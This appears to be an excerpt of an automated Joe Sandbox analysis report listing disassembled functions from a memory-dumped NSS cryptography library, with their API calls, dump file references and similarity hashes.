Function 6C5CBE90 Relevance: 7.6, APIs: 5, Instructions: 141COMMON

Download Yara Rule

APIs

SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,?,?), ref: 6C5CBF06
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C5CBF56
PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5A9F71,?,?,00000000), ref: 6C5CBF7F
CERT_DestroyCertificate.NSS3(00000000), ref: 6C5CBFA9
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C5CC014

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Item_Util$Zfree$CertificateDestroyEncodeError
String ID:
API String ID: 3689625208-0
Opcode ID: 8aa98edbc51640dc3b0935e2d826cff68f3d075710f9772f9fef96fef7693539
Instruction ID: b80a1077d460f7820cdf43f80c55fc5af7966a537a3c88439e57d45c9a560be6
Opcode Fuzzy Hash: 8aa98edbc51640dc3b0935e2d826cff68f3d075710f9772f9fef96fef7693539
Instruction Fuzzy Hash: FD41B475B012059BEB00DEA6CC40BBE77B9AF85248F15412CE919E7B41FB31E945CBE2

Function 6C59EDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C59EDFD
calloc.MOZGLUE(00000001,00000000), ref: 6C59EE64
PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6C59EECC
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C59EEEB
free.MOZGLUE(?), ref: 6C59EEF6

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: ErrorValuecallocfreememcpy
String ID:
API String ID: 3833505462-0
Opcode ID: 390e4d8adf75fc8d10fae67e71e290060d5cd397c559c37b47fc217dc5f98bab
Instruction ID: 6fd23d3d70196a9cbeaf145f8cf79f16233cdadc123f6297f9af6adb2e870885
Opcode Fuzzy Hash: 390e4d8adf75fc8d10fae67e71e290060d5cd397c559c37b47fc217dc5f98bab
Instruction Fuzzy Hash: DE313AB1A00280ABEB209F2DCC44B667BF4FB46314F1409BDE95A87B50DB71E814CBD5

Function 6C5B1F10 Relevance: 7.6, APIs: 5, Instructions: 96COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C5B1F1C

Part of subcall function 6C600FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5A87ED,00000800,6C59EF74,00000000), ref: 6C601000
Part of subcall function 6C600FF0: PR_NewLock.NSS3(?,00000800,6C59EF74,00000000), ref: 6C601016
Part of subcall function 6C600FF0: PL_InitArenaPool.NSS3(00000000,security,6C5A87ED,00000008,?,00000800,6C59EF74,00000000), ref: 6C60102B

SEC_ASN1EncodeItem_Util.NSS3(00000000,0000000100000017,FFFFFFFF,6C6C9EBC), ref: 6C5B1FB8
SEC_ASN1EncodeItem_Util.NSS3(6C6C9E9C,?,?,6C6C9E9C), ref: 6C5B200A
PR_SetError.NSS3(FFFFE022,00000000), ref: 6C5B2020

Part of subcall function 6C5A6A60: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C5AAD50,?,?), ref: 6C5A6A98

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C5B2030

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$ArenaArena_EncodeItem_$Alloc_ErrorFreeInitLockPoolcalloc
String ID:
API String ID: 1390266749-0
Opcode ID: 61798339646780c62c1fb2326b7b57553216e51e720878204763695422a7864c
Instruction ID: 8498682ead4a34a4bae9421bf3ffcdd61b1a0ac2b04ed7a37ce1df5485fa3b06
Opcode Fuzzy Hash: 61798339646780c62c1fb2326b7b57553216e51e720878204763695422a7864c
Instruction Fuzzy Hash: 3121E675A01605BBE7018A15DD50FAB7F68FF4631CF140615E828A6F80E731F929CBB6

Function 6C5A1DD0 Relevance: 7.6, APIs: 5, Instructions: 81timeCOMMON

Download Yara Rule

APIs

DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C5A1E0B
DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C5A1E24
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5A1E3B
PR_SetError.NSS3(FFFFE00B,00000000), ref: 6C5A1E8A
PR_SetError.NSS3(FFFFE00B,00000000), ref: 6C5A1EAD

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Error$Choice_DecodeTimeUtil
String ID:
API String ID: 1529734605-0
Opcode ID: f29ae9ef6bf7bd6544ffecb4377e1737046da0bfa4d999af49920fcfc4b80d68
Instruction ID: a8d465e8c34b7a7fc9c1f927150f163e9dd38be1aaa66c4fb187bbb45b9932cb
Opcode Fuzzy Hash: f29ae9ef6bf7bd6544ffecb4377e1737046da0bfa4d999af49920fcfc4b80d68
Instruction Fuzzy Hash: 8321D372E08314E7D7008EAADC40B9FB7959BC5368F148638ED6957780E731DD0987D6

Function 6C6B1E40 Relevance: 7.6, APIs: 5, Instructions: 75threadCOMMON

Download Yara Rule

APIs

PR_GetCurrentThread.NSS3 ref: 6C6B1E5C

Part of subcall function 6C669BF0: TlsGetValue.KERNEL32(?,?,?,6C6B0A75), ref: 6C669C07

PR_Lock.NSS3(00000000), ref: 6C6B1E75
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C6B1EAB
PR_GetCurrentThread.NSS3 ref: 6C6B1ED0
PR_Unlock.NSS3(?), ref: 6C6B1EE8

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CurrentThread$ErrorLockUnlockValue
String ID:
API String ID: 121300776-0
Opcode ID: 8b5a62af3c1a591db03d3666225d843aee59499bafcd0b9dbb146cded2b14476
Instruction ID: bb85246114b0385dfa0648454ae5192b5604e56aaf8a90417c2d9e33d0699a41
Opcode Fuzzy Hash: 8b5a62af3c1a591db03d3666225d843aee59499bafcd0b9dbb146cded2b14476
Instruction Fuzzy Hash: 0421CC75B14612BBD700CF29D880A46B7B0FF85718B258229E819ABF40D730F823CBD9

Function 6C5FBE60 Relevance: 7.6, APIs: 5, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C5AE708,00000000,00000000,00000004,00000000), ref: 6C5FBE6A

Part of subcall function 6C600840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6008B4

SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C5B04DC,?), ref: 6C5FBE7E

Part of subcall function 6C5FFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C5F8D2D,?,00000000,?), ref: 6C5FFB85
Part of subcall function 6C5FFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C5FFBB1

SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C5FBEC2
PR_SetError.NSS3(FFFFE006,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C5B04DC,?,?), ref: 6C5FBED7
SECITEM_AllocItem_Util.NSS3(?,?,00000002,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C5FBEEB

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Item_$CopyError$AllocAlloc_ArenaFindTag_memcpy
String ID:
API String ID: 1367977078-0
Opcode ID: f1b67ade3d5cf8085e025b4fa9cc4ed7ec3452d35d0e67ef7d4996e844efd303
Instruction ID: dc7c724c3f0934b328c5f142efdc6e301d0b509c960899da6fbaf04cb62f12f6
Opcode Fuzzy Hash: f1b67ade3d5cf8085e025b4fa9cc4ed7ec3452d35d0e67ef7d4996e844efd303
Instruction Fuzzy Hash: 8611E276604205E7F708A965AC80F5773ADAB81798F044125FE2597B52E721D80A8EE1

Function 6C5AAD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,6C5A3FFF,00000000,?,?,?,?,?,6C5A1A1C,00000000,00000000), ref: 6C5AADA7

Part of subcall function 6C6014C0: TlsGetValue.KERNEL32 ref: 6C6014E0
Part of subcall function 6C6014C0: EnterCriticalSection.KERNEL32 ref: 6C6014F5
Part of subcall function 6C6014C0: PR_Unlock.NSS3 ref: 6C60150D

PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6C5A3FFF,00000000,?,?,?,?,?,6C5A1A1C,00000000,00000000), ref: 6C5AADB4

Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C6010F3
Part of subcall function 6C6010C0: EnterCriticalSection.KERNEL32(?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60110C
Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601141
Part of subcall function 6C6010C0: PR_Unlock.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601182
Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60119C

SECITEM_CopyItem_Util.NSS3(00000000,?,6C5A3FFF,?,?,?,?,6C5A3FFF,00000000,?,?,?,?,?,6C5A1A1C,00000000), ref: 6C5AADD5

Part of subcall function 6C5FFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C5F8D2D,?,00000000,?), ref: 6C5FFB85
Part of subcall function 6C5FFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C5FFBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C6C94B0,?,?,?,?,?,?,?,?,6C5A3FFF,00000000,?), ref: 6C5AADEC

Part of subcall function 6C5FB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6D18D0,?), ref: 6C5FB095

PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C5A3FFF), ref: 6C5AAE3C

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
String ID:
API String ID: 2372449006-0
Opcode ID: f9d7b1d93d726d5852c1d03c10d6eb11a2ff678136469c3028d9b6d55afc0c49
Instruction ID: 7842cdc91dee4ae786e049574757e598cb413c8662e1eaf2297d2f24b4537a41
Opcode Fuzzy Hash: f9d7b1d93d726d5852c1d03c10d6eb11a2ff678136469c3028d9b6d55afc0c49
Instruction Fuzzy Hash: B8113B71E003049BE7109BA69C40BBF73F8DF9114DF044628FC5596B41FB20E9598AEA

Function 6C5B8FE0 Relevance: 7.6, APIs: 5, Instructions: 63threadCOMMON

Download Yara Rule

APIs

PR_GetThreadPrivate.NSS3(FFFFFFFF,?,6C5C0710), ref: 6C5B8FF1
PR_CallOnce.NSS3(6C702158,6C5B9150,00000000,?,?,?,6C5B9138,?,6C5C0710), ref: 6C5B9029
calloc.MOZGLUE(00000001,00000000,?,?,6C5C0710), ref: 6C5B904D
memcpy.VCRUNTIME140(00000000,00000000,00000000,?,?,?,?,6C5C0710), ref: 6C5B9066
PR_SetThreadPrivate.NSS3(00000000,?,?,?,?,6C5C0710), ref: 6C5B9078

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: PrivateThread$CallOncecallocmemcpy
String ID:
API String ID: 1176783091-0
Opcode ID: 65e0252dcba46f45fb44b13a48cf3169bdcf2f2b9d671f1e354fcd6f05235cda
Instruction ID: 5189429599179416810a2c6b11e6e8be646f973b1f1cdbcb0ec952ad1ea1a43a
Opcode Fuzzy Hash: 65e0252dcba46f45fb44b13a48cf3169bdcf2f2b9d671f1e354fcd6f05235cda
Instruction Fuzzy Hash: 8011447170016597E7205AAEAC54AB63ABCEBA27ACF100435FC48E2B80F772CD4483E5

Function 6C5CCD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 6C5E1E10: TlsGetValue.KERNEL32 ref: 6C5E1E36
Part of subcall function 6C5E1E10: EnterCriticalSection.KERNEL32(?,?,?,6C5BB1EE,2404110F,?,?), ref: 6C5E1E4B
Part of subcall function 6C5E1E10: PR_Unlock.NSS3 ref: 6C5E1E76

free.MOZGLUE(?,6C5CD079,00000000,00000001), ref: 6C5CCDA5
PK11_FreeSymKey.NSS3(?,6C5CD079,00000000,00000001), ref: 6C5CCDB6
SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C5CD079,00000000,00000001), ref: 6C5CCDCF
DeleteCriticalSection.KERNEL32(?,6C5CD079,00000000,00000001), ref: 6C5CCDE2
free.MOZGLUE(?), ref: 6C5CCDE9

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
String ID:
API String ID: 1720798025-0
Opcode ID: 5ba005ee117732768475093fa9083ae58f6e052f10f01a69e860cb8d9a698bd2
Instruction ID: 92995ee53465cc27c6cdbf4a41796961ac5647b2783ccddb88b4c2de79c07983
Opcode Fuzzy Hash: 5ba005ee117732768475093fa9083ae58f6e052f10f01a69e860cb8d9a698bd2
Instruction Fuzzy Hash: B711A0B2B01116BBEB00AFA5EC84996B77DFB44358B140125E91987E01E732F834C7E2

Function 6C603D90 Relevance: 7.6, APIs: 5, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,-00000001,?,00000000,?,6C6038A2), ref: 6C603DB0
PORT_Alloc_Util.NSS3(00000000,?,000000FF,00000000,00000000,00000000,-00000001,?,00000000,?,6C6038A2), ref: 6C603DBF

Part of subcall function 6C600BE0: malloc.MOZGLUE(6C5F8D2D,?,00000000,?), ref: 6C600BF8
Part of subcall function 6C600BE0: TlsGetValue.KERNEL32(6C5F8D2D,?,00000000,?), ref: 6C600C15

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,6C6038A2), ref: 6C603DD9
_wstat64i32.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,000000FF,?,000000FF,00000000,00000000,6C6038A2), ref: 6C603DE7
free.MOZGLUE(00000000,?,000000FF,00000000,00000000,6C6038A2), ref: 6C603DF8

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: ByteCharMultiWide$Alloc_UtilValue_wstat64i32freemalloc
String ID:
API String ID: 1642359729-0
Opcode ID: e7c4c8249618feb7c3da03312e543b5a769f600f2a1eb58390e79c461d7e734b
Instruction ID: 6aaac80bbb529b0a29755d508bacbb83702a99f9fc52ba80e70af57338060b1c
Opcode Fuzzy Hash: e7c4c8249618feb7c3da03312e543b5a769f600f2a1eb58390e79c461d7e734b
Instruction Fuzzy Hash: 060142B17001223BFB2026762D49E3B3CADCB427A9B100235FC29EA680EA11CC0081F9

Function 6C632CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C635B40: PR_GetIdentitiesLayer.NSS3 ref: 6C635B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C632CEC

Part of subcall function 6C64C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C64C2BF

PR_EnterMonitor.NSS3(?), ref: 6C632D02
PR_EnterMonitor.NSS3(?), ref: 6C632D1F
PR_ExitMonitor.NSS3(?), ref: 6C632D42
PR_ExitMonitor.NSS3(?), ref: 6C632D5B

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction ID: ac0a24202a9a4cc6dc9623819cf481f1fa82a4299bba5dedfbb37272e6a793d0
Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction Fuzzy Hash: A801A5B19042106BE6319F26FC40AC7B7E1EF4631CF006525E85E86B11D632E41587DB

Function 6C632D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C635B40: PR_GetIdentitiesLayer.NSS3 ref: 6C635B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C632D9C

Part of subcall function 6C64C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C64C2BF

PR_EnterMonitor.NSS3(?), ref: 6C632DB2
PR_EnterMonitor.NSS3(?), ref: 6C632DCF
PR_ExitMonitor.NSS3(?), ref: 6C632DF2
PR_ExitMonitor.NSS3(?), ref: 6C632E0B

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction ID: 5bf6b78fe93105b06d3a02957be6d490b1dc58837aadca42626a3408921edab5
Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction Fuzzy Hash: 3701A5B19042106BE7309F26FC01BC7B7A1EF4231CF006435E85E86B11D632F41586DB

Function 6C5CAE30 Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 6C5B3090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5CAE42), ref: 6C5B30AA
Part of subcall function 6C5B3090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C5B30C7
Part of subcall function 6C5B3090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C5B30E5
Part of subcall function 6C5B3090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C5B3116
Part of subcall function 6C5B3090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C5B312B
Part of subcall function 6C5B3090: PK11_DestroyObject.NSS3(?,?), ref: 6C5B3154
Part of subcall function 6C5B3090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5B317E

SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6C5A99FF,?,?,?,?,?,?,?,?,?,6C5A2D6B,?), ref: 6C5CAE67
SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6C5A99FF,?,?,?,?,?,?,?,?,?,6C5A2D6B,?), ref: 6C5CAE7E
SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C5A2D6B,?,?,00000000), ref: 6C5CAE89
PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6C5A2D6B,?,?,00000000), ref: 6C5CAE96
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6C5A2D6B,?,?), ref: 6C5CAEA3

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

